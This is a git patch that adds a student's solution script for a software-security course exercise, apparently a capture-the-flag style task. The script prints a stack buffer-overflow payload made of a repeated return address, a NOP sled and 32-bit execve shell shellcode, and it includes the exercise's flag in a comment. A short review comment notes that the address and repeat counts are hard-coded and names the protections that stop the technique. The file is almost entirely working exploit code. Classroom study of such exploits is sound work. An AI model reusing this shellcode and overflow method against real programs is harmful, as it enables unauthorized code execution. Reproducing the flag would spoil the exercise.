From cf06a6813e22854862d10d785d83e310407a4871 Mon Sep 17 00:00:00 2001
From: Sascha Tommasone
Date: Fri, 14 Jun 2024 16:39:27 +0200
Subject: [PATCH] [Assignment-6] solution task 6 (nop sliding)
---
.../slide_rider/solution.sh | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
create mode 100755 Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
diff --git a/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
new file mode 100755
index 0000000..80fe801
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/
+
+# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}
+
+######### Exploit #########
+# Step 1: Fill the buffer with a candidate return address
+printf "\x0c\xd6\xff\xff%.0s" {1..30}
+
+# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode
+printf "\x90%.0s" {1..2000}
+
+# Step 3: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+###########################
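Review bot: The address in Step 1 and the repeat counts `{1..30}` and `{1..2000}` are hard-coded with no comment on the conditions they depend on, so a reader cannot tell why the script works against the assignment target or why it would fail elsewhere. The four-byte address and the `\xcd\x80` (`int 0x80`) ending of the shellcode suggest a 32-bit build run with stack address randomization off and an executable stack, though nothing in the hunk says so. I would add a header comment such as `# Assumes the assignment binary as shipped (presumably 32-bit, ASLR off, executable stack, no stack protector); the address below was observed in that environment only.` Stating the assumptions also makes the defensive lesson of the exercise explicit: ASLR, a non-executable stack and stack protectors are what stop this technique on a normally hardened build.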